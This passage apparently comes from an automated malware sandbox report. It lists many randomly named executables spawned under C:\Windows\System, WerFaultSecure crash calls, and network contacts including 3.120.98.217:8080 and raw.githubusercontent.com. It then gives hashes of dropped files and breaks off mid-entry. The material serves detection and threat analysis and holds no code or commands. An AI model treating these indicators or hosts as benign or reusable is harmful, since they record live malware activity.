C:\Windows\System\NzfOtBr.exe
C:\Windows\System\ulGHPoy.exe
C:\Windows\System\ulGHPoy.exe
C:\Windows\System\prfqtiN.exe
C:\Windows\System\prfqtiN.exe
C:\Windows\System\KpLKSWJ.exe
C:\Windows\System\KpLKSWJ.exe
C:\Windows\System\cDSdpoL.exe
C:\Windows\System\cDSdpoL.exe
C:\Windows\System\SKkOctV.exe
C:\Windows\System\SKkOctV.exe
C:\Windows\System\MlHVUnl.exe
C:\Windows\System\MlHVUnl.exe
C:\Windows\System\wIDAEpR.exe
C:\Windows\System\wIDAEpR.exe
C:\Windows\System\WWVIywo.exe
C:\Windows\System\WWVIywo.exe
C:\Windows\System\BYvnBgH.exe
C:\Windows\System\BYvnBgH.exe
C:\Windows\System\nAtAKJm.exe
C:\Windows\System\nAtAKJm.exe
C:\Windows\System\UrEDAty.exe
C:\Windows\System\UrEDAty.exe
C:\Windows\System\NCUiHJS.exe
C:\Windows\System\NCUiHJS.exe
C:\Windows\System\tNTnyAL.exe
C:\Windows\System\tNTnyAL.exe
C:\Windows\System\zKTPYNy.exe
C:\Windows\System\zKTPYNy.exe
C:\Windows\System\qUCcXsQ.exe
C:\Windows\System\qUCcXsQ.exe
C:\Windows\System\QgGJXoU.exe
C:\Windows\System\QgGJXoU.exe
C:\Windows\System\gAUjSws.exe
C:\Windows\System\gAUjSws.exe
C:\Windows\System\rIHUzjR.exe
C:\Windows\System\rIHUzjR.exe
C:\Windows\System\kkkADGh.exe
C:\Windows\System\kkkADGh.exe
C:\Windows\System\jHIheIs.exe
C:\Windows\System\jHIheIs.exe
C:\Windows\System\wOweGKh.exe
C:\Windows\System\wOweGKh.exe
C:\Windows\System\WSUEKHv.exe
C:\Windows\System\WSUEKHv.exe
C:\Windows\System\ZmXbfSK.exe
C:\Windows\System\ZmXbfSK.exe
C:\Windows\System\QEeNVJt.exe
C:\Windows\System\QEeNVJt.exe
C:\Windows\System\PvNLrTt.exe
C:\Windows\System\PvNLrTt.exe
C:\Windows\System\BxRzyat.exe
C:\Windows\System\BxRzyat.exe
C:\Windows\System\pfnzGYL.exe
C:\Windows\System\pfnzGYL.exe
C:\Windows\System\ueTiTDS.exe
C:\Windows\System\ueTiTDS.exe
C:\Windows\System\jafiJAs.exe
C:\Windows\System\jafiJAs.exe
C:\Windows\System\maJhowZ.exe
C:\Windows\System\maJhowZ.exe
C:\Windows\System\ptmFYXx.exe
C:\Windows\System\ptmFYXx.exe
C:\Windows\System\GInjOPW.exe
C:\Windows\System\GInjOPW.exe
C:\Windows\System\AxuWouK.exe
C:\Windows\System\AxuWouK.exe
C:\Windows\System\Egkhrwg.exe
C:\Windows\System\Egkhrwg.exe
C:\Windows\System\KQzUusT.exe
C:\Windows\System\KQzUusT.exe
C:\Windows\System\HiuZIki.exe
C:\Windows\System\HiuZIki.exe
C:\Windows\System\ANaXDvt.exe
C:\Windows\System\ANaXDvt.exe
C:\Windows\System\yCEWCAA.exe
C:\Windows\System\yCEWCAA.exe
C:\Windows\System\cLpJtRS.exe
C:\Windows\System\cLpJtRS.exe
C:\Windows\System\pZgAJbz.exe
C:\Windows\System\pZgAJbz.exe
C:\Windows\System\AxySaAu.exe
C:\Windows\System\AxySaAu.exe
C:\Windows\System\oViuURl.exe
C:\Windows\System\oViuURl.exe
C:\Windows\System\IIkYsIm.exe
C:\Windows\System\IIkYsIm.exe
C:\Windows\System\HDSFvmT.exe
C:\Windows\System\HDSFvmT.exe
C:\Windows\System\EskKmGW.exe
C:\Windows\System\EskKmGW.exe
C:\Windows\System\QdTxhQw.exe
C:\Windows\System\QdTxhQw.exe
C:\Windows\System\DumQgKv.exe
C:\Windows\System\DumQgKv.exe
C:\Windows\System\rmgYXhH.exe
C:\Windows\System\rmgYXhH.exe
C:\Windows\System\WjLookJ.exe
C:\Windows\System\WjLookJ.exe
C:\Windows\System\AyqupJG.exe
C:\Windows\System\AyqupJG.exe
C:\Windows\System\saiGnnk.exe
C:\Windows\System\saiGnnk.exe
C:\Windows\System\YleMOUI.exe
C:\Windows\System\YleMOUI.exe
C:\Windows\System\ccgIqTQ.exe
C:\Windows\System\ccgIqTQ.exe
C:\Windows\System\zVNLUhX.exe
C:\Windows\System\zVNLUhX.exe
C:\Windows\System\oytZsbW.exe
C:\Windows\System\oytZsbW.exe
C:\Windows\System\QoGAZoL.exe
C:\Windows\System\QoGAZoL.exe
C:\Windows\System\FLJQPtS.exe
C:\Windows\System\FLJQPtS.exe
C:\Windows\System\VaCnLgP.exe
C:\Windows\System\VaCnLgP.exe
C:\Windows\System\FiTEnxR.exe
C:\Windows\System\FiTEnxR.exe
C:\Windows\System\qCpDFWU.exe
C:\Windows\System\qCpDFWU.exe
C:\Windows\System\IwQhbgv.exe
C:\Windows\System\IwQhbgv.exe
C:\Windows\System\aAbDpdw.exe
C:\Windows\System\aAbDpdw.exe
C:\Windows\System\CjcXzQD.exe
C:\Windows\System\CjcXzQD.exe
C:\Windows\System\pnxZmZH.exe
C:\Windows\System\pnxZmZH.exe
C:\Windows\System\UbIpcMZ.exe
C:\Windows\System\UbIpcMZ.exe
C:\Windows\System\VqdGqkR.exe
C:\Windows\System\VqdGqkR.exe
C:\Windows\System\skzacKR.exe
C:\Windows\System\skzacKR.exe
C:\Windows\System\uCQISgs.exe
C:\Windows\System\uCQISgs.exe
C:\Windows\System\yMXWWFo.exe
C:\Windows\System\yMXWWFo.exe
C:\Windows\System\SWnrmWT.exe
C:\Windows\System\SWnrmWT.exe
C:\Windows\System\qtPXYrA.exe
C:\Windows\System\qtPXYrA.exe
C:\Windows\System\UHmXkDd.exe
C:\Windows\System\UHmXkDd.exe
C:\Windows\System\ikbMusT.exe
C:\Windows\System\ikbMusT.exe
C:\Windows\System\CCbdvRI.exe
C:\Windows\System\CCbdvRI.exe
C:\Windows\System\IQrzVSZ.exe
C:\Windows\System\IQrzVSZ.exe
C:\Windows\System\GogZPsA.exe
C:\Windows\System\GogZPsA.exe
C:\Windows\System\ZVEEvZl.exe
C:\Windows\System\ZVEEvZl.exe
C:\Windows\System\mqmLcSy.exe
C:\Windows\System\mqmLcSy.exe
C:\Windows\System\uArEJRu.exe
C:\Windows\System\uArEJRu.exe
C:\Windows\System\nMmOXJy.exe
C:\Windows\System\nMmOXJy.exe
C:\Windows\System\NhxCPsq.exe
C:\Windows\System\NhxCPsq.exe
C:\Windows\System\XpvNgPt.exe
C:\Windows\System\XpvNgPt.exe
C:\Windows\System\aYDiiti.exe
C:\Windows\System\aYDiiti.exe
C:\Windows\System\JkBlwix.exe
C:\Windows\System\JkBlwix.exe
C:\Windows\System\VVgSVdg.exe
C:\Windows\System\VVgSVdg.exe
C:\Windows\System\gkwJSyK.exe
C:\Windows\System\gkwJSyK.exe
C:\Windows\System\PBvXstd.exe
C:\Windows\System\PBvXstd.exe
C:\Windows\System\ZplnjHS.exe
C:\Windows\System\ZplnjHS.exe
C:\Windows\System\EiWWhVp.exe
C:\Windows\System\EiWWhVp.exe
C:\Windows\System\ElRbMSa.exe
C:\Windows\System\ElRbMSa.exe
C:\Windows\System\XDoxGWt.exe
C:\Windows\System\XDoxGWt.exe
C:\Windows\System\FkMfNUg.exe
C:\Windows\System\FkMfNUg.exe
C:\Windows\System\gUgtsCc.exe
C:\Windows\System\gUgtsCc.exe
C:\Windows\System\JeTXljB.exe
C:\Windows\System\JeTXljB.exe
C:\Windows\System\sDaFqkb.exe
C:\Windows\System\sDaFqkb.exe
C:\Windows\System\qZzowHO.exe
C:\Windows\System\qZzowHO.exe
C:\Windows\System\GCzTPYJ.exe
C:\Windows\System\GCzTPYJ.exe
C:\Windows\System\CLORjrm.exe
C:\Windows\System\CLORjrm.exe
C:\Windows\System\yaDXLEN.exe
C:\Windows\System\yaDXLEN.exe
C:\Windows\System\YYhYZth.exe
C:\Windows\System\YYhYZth.exe
C:\Windows\System\srokxhz.exe
C:\Windows\System\srokxhz.exe
C:\Windows\System\nkusNUB.exe
C:\Windows\System\nkusNUB.exe
C:\Windows\System\iruQlon.exe
C:\Windows\System\iruQlon.exe
C:\Windows\System\VstOqVu.exe
C:\Windows\System\VstOqVu.exe
C:\Windows\System\klMnmdk.exe
C:\Windows\System\klMnmdk.exe
C:\Windows\System\hlfIrbn.exe
C:\Windows\System\hlfIrbn.exe
C:\Windows\System\rNCtWrk.exe
C:\Windows\System\rNCtWrk.exe
C:\Windows\System\RnSGdXx.exe
C:\Windows\System\RnSGdXx.exe
C:\Windows\System\WjEudfx.exe
C:\Windows\System\WjEudfx.exe
C:\Windows\System\NQGcMQN.exe
C:\Windows\System\NQGcMQN.exe
C:\Windows\System\EsXtAym.exe
C:\Windows\System\EsXtAym.exe
C:\Windows\System\imGuQDx.exe
C:\Windows\System\imGuQDx.exe
C:\Windows\System\YheVfWH.exe
C:\Windows\System\YheVfWH.exe
C:\Windows\System\mfcIPFI.exe
C:\Windows\System\mfcIPFI.exe
C:\Windows\System\LkafMBa.exe
C:\Windows\System\LkafMBa.exe
C:\Windows\System\FvVMMiz.exe
C:\Windows\System\FvVMMiz.exe
C:\Windows\System\FkCYicX.exe
C:\Windows\System\FkCYicX.exe
C:\Windows\System\VUXFAhV.exe
C:\Windows\System\VUXFAhV.exe
C:\Windows\System\GljdpXP.exe
C:\Windows\System\GljdpXP.exe
C:\Windows\System\fbmVCRd.exe
C:\Windows\System\fbmVCRd.exe
C:\Windows\System\htzqJng.exe
C:\Windows\System\htzqJng.exe
C:\Windows\System\hTNizXU.exe
C:\Windows\System\hTNizXU.exe
C:\Windows\System\TKfvEtO.exe
C:\Windows\System\TKfvEtO.exe
C:\Windows\System\pGFalGP.exe
C:\Windows\System\pGFalGP.exe
C:\Windows\System\UtjKtlr.exe
C:\Windows\System\UtjKtlr.exe
C:\Windows\System\HDhUMkc.exe
C:\Windows\System\HDhUMkc.exe
C:\Windows\System\OXDxjEF.exe
C:\Windows\System\OXDxjEF.exe
C:\Windows\System\kBzDsze.exe
C:\Windows\System\kBzDsze.exe
C:\Windows\System\PlQMhtA.exe
C:\Windows\System\PlQMhtA.exe
C:\Windows\System\NcEvWbt.exe
C:\Windows\System\NcEvWbt.exe
C:\Windows\System\NcTYcSt.exe
C:\Windows\System\NcTYcSt.exe
C:\Windows\System\aAIPbSB.exe
C:\Windows\System\aAIPbSB.exe
C:\Windows\System\mjksFnB.exe
C:\Windows\System\mjksFnB.exe
C:\Windows\System\aQnmejw.exe
C:\Windows\System\aQnmejw.exe
C:\Windows\System\SYSSkbo.exe
C:\Windows\System\SYSSkbo.exe
C:\Windows\System\MFzwUJl.exe
C:\Windows\System\MFzwUJl.exe
C:\Windows\System\NzPenyr.exe
C:\Windows\System\NzPenyr.exe
C:\Windows\System\PijZQzm.exe
C:\Windows\System\PijZQzm.exe
C:\Windows\System\LKoGTyW.exe
C:\Windows\System\LKoGTyW.exe
C:\Windows\System\gpbwrsa.exe
C:\Windows\System\gpbwrsa.exe
C:\Windows\System\MKZMxRR.exe
C:\Windows\System\MKZMxRR.exe
C:\Windows\System\dzGAquB.exe
C:\Windows\System\dzGAquB.exe
C:\Windows\System\jbbsvTx.exe
C:\Windows\System\jbbsvTx.exe
C:\Windows\System\hIStFZQ.exe
C:\Windows\System\hIStFZQ.exe
C:\Windows\System\HEogASI.exe
C:\Windows\System\HEogASI.exe
C:\Windows\System\cmjflju.exe
C:\Windows\System\cmjflju.exe
C:\Windows\System\roXCOvJ.exe
C:\Windows\System\roXCOvJ.exe
C:\Windows\System\xhJJmBO.exe
C:\Windows\System\xhJJmBO.exe
C:\Windows\System\PVNrlXy.exe
C:\Windows\System\PVNrlXy.exe
C:\Windows\System\RshYLPU.exe
C:\Windows\System\RshYLPU.exe
C:\Windows\System\ozZblOZ.exe
C:\Windows\System\ozZblOZ.exe
C:\Windows\System\arqejLt.exe
C:\Windows\System\arqejLt.exe
C:\Windows\System\nQAVDgl.exe
C:\Windows\System\nQAVDgl.exe
C:\Windows\System\gLPQdsw.exe
C:\Windows\System\gLPQdsw.exe
C:\Windows\System\RAbVscl.exe
C:\Windows\System\RAbVscl.exe
C:\Windows\System\cpIFHDA.exe
C:\Windows\System\cpIFHDA.exe
C:\Windows\System\OcfdVrC.exe
C:\Windows\System\OcfdVrC.exe
C:\Windows\System\QzZHnub.exe
C:\Windows\System\QzZHnub.exe
C:\Windows\System\hURZknZ.exe
C:\Windows\System\hURZknZ.exe
C:\Windows\System\BzoGOEs.exe
C:\Windows\System\BzoGOEs.exe
C:\Windows\System\uZOIOEs.exe
C:\Windows\System\uZOIOEs.exe
C:\Windows\System\mVryfOx.exe
C:\Windows\System\mVryfOx.exe
C:\Windows\System\sVMcybB.exe
C:\Windows\System\sVMcybB.exe
C:\Windows\System\OKvbeAc.exe
C:\Windows\System\OKvbeAc.exe
C:\Windows\System\gfXPRtQ.exe
C:\Windows\System\gfXPRtQ.exe
C:\Windows\System\YiphJol.exe
C:\Windows\System\YiphJol.exe
C:\Windows\System\EGebloh.exe
C:\Windows\System\EGebloh.exe
C:\Windows\System\HVnKEbP.exe
C:\Windows\System\HVnKEbP.exe
C:\Windows\System\dosBnHK.exe
C:\Windows\System\dosBnHK.exe
C:\Windows\System\nvqPqLS.exe
C:\Windows\System\nvqPqLS.exe
C:\Windows\System\OXtxtQh.exe
C:\Windows\System\OXtxtQh.exe
C:\Windows\System\gyAArSv.exe
C:\Windows\System\gyAArSv.exe
C:\Windows\System\rryBCfj.exe
C:\Windows\System\rryBCfj.exe
C:\Windows\System\drWhckd.exe
C:\Windows\System\drWhckd.exe
C:\Windows\System\CVOrTeF.exe
C:\Windows\System\CVOrTeF.exe
C:\Windows\System\MzpuCdi.exe
C:\Windows\System\MzpuCdi.exe
C:\Windows\System\TqAtqit.exe
C:\Windows\System\TqAtqit.exe
C:\Windows\System\uEdKAOj.exe
C:\Windows\System\uEdKAOj.exe
C:\Windows\System\iPOTTHG.exe
C:\Windows\System\iPOTTHG.exe
C:\Windows\System\rHjxxWi.exe
C:\Windows\System\rHjxxWi.exe
C:\Windows\System\KthDHMg.exe
C:\Windows\System\KthDHMg.exe
C:\Windows\System\yQBdyMC.exe
C:\Windows\System\yQBdyMC.exe
C:\Windows\System\BfGNSwl.exe
C:\Windows\System\BfGNSwl.exe
C:\Windows\System\KASLlmi.exe
C:\Windows\System\KASLlmi.exe
C:\Windows\System\HXjJCXz.exe
C:\Windows\System\HXjJCXz.exe
C:\Windows\System\qgbsBDe.exe
C:\Windows\System\qgbsBDe.exe
C:\Windows\System\xUwnfsN.exe
C:\Windows\System\xUwnfsN.exe
C:\Windows\System\GQAOFPS.exe
C:\Windows\System\GQAOFPS.exe
C:\Windows\System\DLZdMuv.exe
C:\Windows\System\DLZdMuv.exe
C:\Windows\System\TXQMVSM.exe
C:\Windows\System\TXQMVSM.exe
C:\Windows\System\rxxvXpj.exe
C:\Windows\System\rxxvXpj.exe
C:\Windows\System\UXyqrdo.exe
C:\Windows\System\UXyqrdo.exe
C:\Windows\System\IiPflOL.exe
C:\Windows\System\IiPflOL.exe
C:\Windows\System\chnwyIe.exe
C:\Windows\System\chnwyIe.exe
C:\Windows\System\dyQgmsC.exe
C:\Windows\System\dyQgmsC.exe
C:\Windows\System\XtEzAlr.exe
C:\Windows\System\XtEzAlr.exe
C:\Windows\System\uzRwZRB.exe
C:\Windows\System\uzRwZRB.exe
C:\Windows\System\nLsYbUw.exe
C:\Windows\System\nLsYbUw.exe
C:\Windows\System\AbnyYTw.exe
C:\Windows\System\AbnyYTw.exe
C:\Windows\System\xAJnVqs.exe
C:\Windows\System\xAJnVqs.exe
C:\Windows\System\FyJczxA.exe
C:\Windows\System\FyJczxA.exe
C:\Windows\System\WyZGpxG.exe
C:\Windows\System\WyZGpxG.exe
C:\Windows\System\mNpyYRO.exe
C:\Windows\System\mNpyYRO.exe
C:\Windows\System\slNoXlM.exe
C:\Windows\System\slNoXlM.exe
C:\Windows\System\PlzORpR.exe
C:\Windows\System\PlzORpR.exe
C:\Windows\System\rdOotBa.exe
C:\Windows\System\rdOotBa.exe
C:\Windows\System\ShhgsnN.exe
C:\Windows\System\ShhgsnN.exe
C:\Windows\System\caPSkYs.exe
C:\Windows\System\caPSkYs.exe
C:\Windows\System\kvlMlkr.exe
C:\Windows\System\kvlMlkr.exe
C:\Windows\System\PbVVaJX.exe
C:\Windows\System\PbVVaJX.exe
C:\Windows\System\LKfpcli.exe
C:\Windows\System\LKfpcli.exe
C:\Windows\System\nJEaLBE.exe
C:\Windows\System\nJEaLBE.exe
C:\Windows\System\nHWvPxv.exe
C:\Windows\System\nHWvPxv.exe
C:\Windows\System\LkaVFEE.exe
C:\Windows\System\LkaVFEE.exe
C:\Windows\System\uhKQmDl.exe
C:\Windows\System\uhKQmDl.exe
C:\Windows\System\iersgYw.exe
C:\Windows\System\iersgYw.exe
C:\Windows\System\kyCXIAy.exe
C:\Windows\System\kyCXIAy.exe
C:\Windows\System\WVpMJKb.exe
C:\Windows\System\WVpMJKb.exe
C:\Windows\System\LmizchL.exe
C:\Windows\System\LmizchL.exe
C:\Windows\System\uBeeRyj.exe
C:\Windows\System\uBeeRyj.exe
C:\Windows\System\jBaPLbW.exe
C:\Windows\System\jBaPLbW.exe
C:\Windows\System\SBlKeAP.exe
C:\Windows\System\SBlKeAP.exe
C:\Windows\System\QwiphrM.exe
C:\Windows\System\QwiphrM.exe
C:\Windows\System\kqdfHfh.exe
C:\Windows\System\kqdfHfh.exe
C:\Windows\System\gnUNcQI.exe
C:\Windows\System\gnUNcQI.exe
C:\Windows\System\zFfHncM.exe
C:\Windows\System\zFfHncM.exe
C:\Windows\System\LJFPXZE.exe
C:\Windows\System\LJFPXZE.exe
C:\Windows\System\eXrSiLc.exe
C:\Windows\System\eXrSiLc.exe
C:\Windows\System\wkCkCUb.exe
C:\Windows\System\wkCkCUb.exe
C:\Windows\System\gmUQnmg.exe
C:\Windows\System\gmUQnmg.exe
C:\Windows\System\RYdmtNs.exe
C:\Windows\System\RYdmtNs.exe
C:\Windows\System\GqxlEUf.exe
C:\Windows\System\GqxlEUf.exe
C:\Windows\System\oKofPji.exe
C:\Windows\System\oKofPji.exe
C:\Windows\System\ylECVUZ.exe
C:\Windows\System\ylECVUZ.exe
C:\Windows\System\BismCxM.exe
C:\Windows\System\BismCxM.exe
C:\Windows\System\NLdxkqy.exe
C:\Windows\System\NLdxkqy.exe
C:\Windows\System\wgsixeX.exe
C:\Windows\System\wgsixeX.exe
C:\Windows\System\dQuXWHH.exe
C:\Windows\System\dQuXWHH.exe
C:\Windows\System\iZYNCQF.exe
C:\Windows\System\iZYNCQF.exe
C:\Windows\System\DRUseWC.exe
C:\Windows\System\DRUseWC.exe
C:\Windows\System\QqpvYrJ.exe
C:\Windows\System\QqpvYrJ.exe
C:\Windows\System\vLEQFEK.exe
C:\Windows\System\vLEQFEK.exe
C:\Windows\System\IMmosIR.exe
C:\Windows\System\IMmosIR.exe
C:\Windows\System\MjPJDbP.exe
C:\Windows\System\MjPJDbP.exe
C:\Windows\System\mHwsRzo.exe
C:\Windows\System\mHwsRzo.exe
C:\Windows\System\TZhYlXV.exe
C:\Windows\System\TZhYlXV.exe
C:\Windows\System\GglaWXs.exe
C:\Windows\System\GglaWXs.exe
C:\Windows\System\kizoJVe.exe
C:\Windows\System\kizoJVe.exe
C:\Windows\System\iYqUvID.exe
C:\Windows\System\iYqUvID.exe
C:\Windows\System\VLALABx.exe
C:\Windows\System\VLALABx.exe
C:\Windows\System\jjRGHPf.exe
C:\Windows\System\jjRGHPf.exe
C:\Windows\System\oSKOgdq.exe
C:\Windows\System\oSKOgdq.exe
C:\Windows\System\dOpfmyV.exe
C:\Windows\System\dOpfmyV.exe
C:\Windows\System\vUAhTIC.exe
C:\Windows\System\vUAhTIC.exe
C:\Windows\System\nbRRWzK.exe
C:\Windows\System\nbRRWzK.exe
C:\Windows\System\jbxgxiM.exe
C:\Windows\System\jbxgxiM.exe
C:\Windows\System\aKIWKeM.exe
C:\Windows\System\aKIWKeM.exe
C:\Windows\System\YaQZaJY.exe
C:\Windows\System\YaQZaJY.exe
C:\Windows\System\qAqaFSL.exe
C:\Windows\System\qAqaFSL.exe
C:\Windows\System\BqRWApF.exe
C:\Windows\System\BqRWApF.exe
C:\Windows\System\VBHrDKI.exe
C:\Windows\System\VBHrDKI.exe
C:\Windows\System\XXtwGVm.exe
C:\Windows\System\XXtwGVm.exe
C:\Windows\System\zVjVXNs.exe
C:\Windows\System\zVjVXNs.exe
C:\Windows\System\VwbwvrN.exe
C:\Windows\System\VwbwvrN.exe
C:\Windows\System\brhWrpO.exe
C:\Windows\System\brhWrpO.exe
C:\Windows\System\blfGmda.exe
C:\Windows\System\blfGmda.exe
C:\Windows\System\wVCpxkt.exe
C:\Windows\System\wVCpxkt.exe
C:\Windows\System\WItkmkE.exe
C:\Windows\System\WItkmkE.exe
C:\Windows\System\esWmvru.exe
C:\Windows\System\esWmvru.exe
C:\Windows\System\sYHSFoZ.exe
C:\Windows\System\sYHSFoZ.exe
C:\Windows\System\PjSoNrd.exe
C:\Windows\System\PjSoNrd.exe
C:\Windows\System\ldVpkXv.exe
C:\Windows\System\ldVpkXv.exe
C:\Windows\System\WpNHZbq.exe
C:\Windows\System\WpNHZbq.exe
C:\Windows\System\jquTvcl.exe
C:\Windows\System\jquTvcl.exe
C:\Windows\System\bJQJUZy.exe
C:\Windows\System\bJQJUZy.exe
C:\Windows\System\KUqekPL.exe
C:\Windows\System\KUqekPL.exe
C:\Windows\System\AZwliaS.exe
C:\Windows\System\AZwliaS.exe
C:\Windows\System\gWDFFgT.exe
C:\Windows\System\gWDFFgT.exe
C:\Windows\System\BhqEqGi.exe
C:\Windows\System\BhqEqGi.exe
C:\Windows\System\WugYHPZ.exe
C:\Windows\System\WugYHPZ.exe
C:\Windows\System\KWGGJlQ.exe
C:\Windows\System\KWGGJlQ.exe
C:\Windows\System\mSUpdWu.exe
C:\Windows\System\mSUpdWu.exe
C:\Windows\System\BBOfBBl.exe
C:\Windows\System\BBOfBBl.exe
C:\Windows\System\FsfgaDM.exe
C:\Windows\System\FsfgaDM.exe
C:\Windows\System\TnaMPyG.exe
C:\Windows\System\TnaMPyG.exe
C:\Windows\System\HdZyzBj.exe
C:\Windows\System\HdZyzBj.exe
C:\Windows\System\cnuRWnX.exe
C:\Windows\System\cnuRWnX.exe
C:\Windows\System\veXmlds.exe
C:\Windows\System\veXmlds.exe
C:\Windows\System\nxlGSml.exe
C:\Windows\System\nxlGSml.exe
C:\Windows\System\SlesPOU.exe
C:\Windows\System\SlesPOU.exe
C:\Windows\System\RObItDu.exe
C:\Windows\System\RObItDu.exe
C:\Windows\System\QimWawl.exe
C:\Windows\System\QimWawl.exe
C:\Windows\System\PiOQtTJ.exe
C:\Windows\System\PiOQtTJ.exe
C:\Windows\System\cbYJHoF.exe
C:\Windows\System\cbYJHoF.exe
C:\Windows\System\zNGaMbj.exe
C:\Windows\System\zNGaMbj.exe
C:\Windows\System\cFLluYe.exe
C:\Windows\System\cFLluYe.exe
C:\Windows\System\hDNRKre.exe
C:\Windows\System\hDNRKre.exe
C:\Windows\System\XVRAHSy.exe
C:\Windows\System\XVRAHSy.exe
C:\Windows\system32\WerFaultSecure.exe
"C:\Windows\system32\WerFaultSecure.exe" -protectedcrash -p 60 -i 60 -h 472 -j 468 -s 480 -d 0
C:\Windows\system32\WerFaultSecure.exe
C:\Windows\system32\WerFaultSecure.exe -u -p 60 -s 2184
Network
| Country | Destination | Domain | Proto |
| DE | 3.120.98.217:8080 | tcp | |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | 154.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
Files
memory/3212-0-0x00007FF66B460000-0x00007FF66B856000-memory.dmp
memory/3212-1-0x0000022D59F30000-0x0000022D59F40000-memory.dmp
C:\Windows\System\EWdOxVy.exe
| MD5 | f5ee345af397590609c67e79d32aa71a |
| SHA1 | 70c7d4e59641b7916bfa1ef779c10ce317c0030e |
| SHA256 | 0f567c570b6efcabbba95a915ac2842f796f919953757b3f37dcd719867c3ca2 |
| SHA512 | 38907d09f5a04b75a9271ebd12b4575dcb493beb73d9dcbec7752594d7ac29021dc6a3c2caf59781aecfceebfcbeafbcb77f56325ff4a44c48d9f38428038494 |
C:\Windows\System\brHqTLB.exe
| MD5 | 0f9b420901f149036eb52a31feb9c95e |
| SHA1 | 11dbca6da39716e3860d021dd9ace6bf755f263c |
| SHA256 | c1695ec3da6bff51a54a36c32afabf0874ce39d3b92e26af99e125cfed29a386 |
| SHA512 | c25d2daacba6bb5f7d4ad8c35f790fd9b6f810b0a2f688b55c717ea716a420c5693b573a8a0e4d04d4ca8411743d9762427acdf3e99493ded1d92a56f4024aac |
C:\Windows\System\IBMKRWO.exe
| MD5 | 53d0cc27d01995a9ab41acab2c2aaecc |
| SHA1 | 9244495e6d3c268cbfb71707f2dda260b94e08d2 |
| SHA256 | 6f34427750c3c3ccc77b90b3aacf02f5b85374275c929434d399921cfafa32a4 |
| SHA512 | c7feec26de83eaec13bf0ba1480a40e918b38957ffee8ef31b64bc51cb54dc5f1af07bf95c259877c23e1368c6d9ce294d78efec529f0a2b6471f46a3e40b2b6 |
memory/1468-25-0x00007FF6F9C50000-0x00007FF6FA046000-memory.dmp
memory/2792-35-0x00007FF64AAF0000-0x00007FF64AEE6000-memory.dmp
C:\Windows\System\OwTpFMC.exe
| MD5 | b30c6cf6f9e769f81535933ddf2c7497 |
| SHA1 | 808757f40d9e8ebc9f0733f3881a753ac3a66029 |
| SHA256 | f9040b37bc571278d0c781fd7f37a8af5bc59db031c3b07e977d9fc939731ce4 |
| SHA512 | 7401d3e94b85e724bdf70237208a80a3375ef6141bcbc34e3bcefb3a70410e36e58cee6fde99fa3400e9e606c52407528d4427580337d8dc4feade2870b4470a |
C:\Windows\System\Burqpzn.exe
| MD5 | 555f1ec1bda52c7125cd15c5dc93f589 |
| SHA1 | ea2aca5d98fdd09c54facfe1776d3aa36e7ef7b6 |
| SHA256 | cd2464026385f64f6f193f13d633294ad5a2d097758c5a9f8ff067a248f504a1 |
| SHA512 | 0d102891c05d643761a1007ed860f757a1d3e483211ac52a11fd953724dca4c072dd7673b7c0b93ced537ed5c1f4543e5c218476a7cb70caf367676b58714e64 |
C:\Windows\System\RdtjIlK.exe
| MD5 | 40d566bac017db3cac07b9311d3cd3c1 |
| SHA1 | 4996909526dc2041dbf130412b057c4368acbdfc |
| SHA256 | daa4c44eadd6c6beb6d85d0aab8e02a6403db29f59c6710a06b0937e44e9ab82 |
| SHA512 | b188d4b34e438787dbe90070bec18754a7a91d09140bee01050369f41fc0642cc3e246ed6eb7786eba836376b40d64d265ed8ea1d7a5e119082a4508376d14c5 |
memory/980-772-0x00007FF634210000-0x00007FF634606000-memory.dmp
memory/2564-436-0x000001B8F79C0000-0x000001B8F8166000-memory.dmp
C:\Windows\System\JwmkKWr.exe
| MD5 | 65971be7dec3df289a83fd8db666ac5e |
| SHA1 | a8afaab9a6704d698b00b224d83ebc9ccde3b23a |
| SHA256 | 9ad00950a3a79bf7c0b9a6949b3b031a51fc67db724ea427d1efcbb58ced46e8 |
| SHA512 | cb57e7b9db8222cb09ec7eeba9b4557e72dbe5f854a3f2090aa832bdc3dd383a650d037d1f72cebc85eb1d23683709f87640bcc55cd9555f598a93569836e4de |
C:\Windows\System\SyqIKiE.exe
| MD5 | abe7bf58536d6caf152bfe70c3717c15 |
| SHA1 | 5af5359a9cec55d35831485f4616a8ee3214ba56 |
| SHA256 | 9361d172989ed560aececd1646cb2494a22f3a59e0b078bce514d5019b16f2ff |
| SHA512 | 65ee1470e6b2b883e68c190ac99d22d31e0d06f13dcfed4f6590b50aa9feb968e1a5b41a76aad82d1b6e945c851079e7e2c9a90d8e6493e96c208fb33e1de18f |
C:\Windows\System\zoOJLVN.exe
| MD5 | 5b4ebd99b4b7d34cbcf6b8485dc7c43f |
| SHA1 | 616ae90b03d7f0d559cc0e04803bd073b0473978 |
| SHA256 | c3374d7436a91197736ecb3b9bf0777af289276a328b004f21a243877c191779 |
| SHA512 | 52a36194c3fb89b18b8617e2a18984b38382f9d8744f37b912f3f8b9f74edb787c78efd7045c9f006002035b80064536cb797ea114251511cd854ab3867b3b7e |
C:\Windows\System\whoZHnc.exe
| MD5 | ff3a1293637442abfe1499fc4c5de9c0 |
